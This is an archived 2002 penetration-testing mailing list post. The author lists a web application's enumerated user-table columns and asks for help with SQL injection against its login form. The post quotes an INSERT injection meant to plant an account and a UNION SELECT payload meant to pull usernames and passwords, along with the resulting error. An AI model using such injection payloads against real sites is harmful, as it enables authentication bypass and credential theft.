Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

sql table data enumeration help please.

From: "Gary O'leary-Steele" <GaryO () sec-1 com>
Date: Thu, 9 May 2002 20:47:43 +0100
Hi all,


I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data


tblusers.ID                             uniqueidentifier
tblusers.createdtimestamp       smalldatetime
tblusers.sessionID              nvarchar
tblUsers.LastUpdated            smalldatetime
tblUsers.LastUpdatedIP          nvarchar
tblUsers.LastUpdatedBy          uniqueidentifier
tblUsers.CompanyType            nvarchar
tblUsers.CompanyID              uniqueidentifier
tblUsers.Password                       nvarchar
tblUsers.UserName                       nvarchar
tblUsers.Title                  nvarchar
tblUsers.Surname                        nvarchar
tblUsers.Forename                       nvarchar
tblUsers.AddressTo              nvarchar
tblUsers.Appointment            nvarchar
tblUsers.DirectPhone            nvarchar
tblUsers.Mobile                 nvarchar
tblUsers.DirectEmail            nvarchar
tblUsers.DirectFax              nvarchar
tblUsers.Signature              The text, ntext, and image data types are invalid in
this subquery or aggregate expression.
tblUsers.Address1               nvarchar
tblUsers.Address2               nvarchar
tblUsers.Address3               nvarchar
tblUsers.Address4               nvarchar
tblUsers.Address5               nvarchar
tblUsers.PostCode               nvarchar
tblUsers.HomePhone              nvarchar
tblUsers.UserAccess             bit

I want to update the table to bypass the auth screen

I have tried

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo () sec-1 com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy

In an attempt to gain access to data held with the username and password
fields I have tried

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"


Any help would be greatly appreciated


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: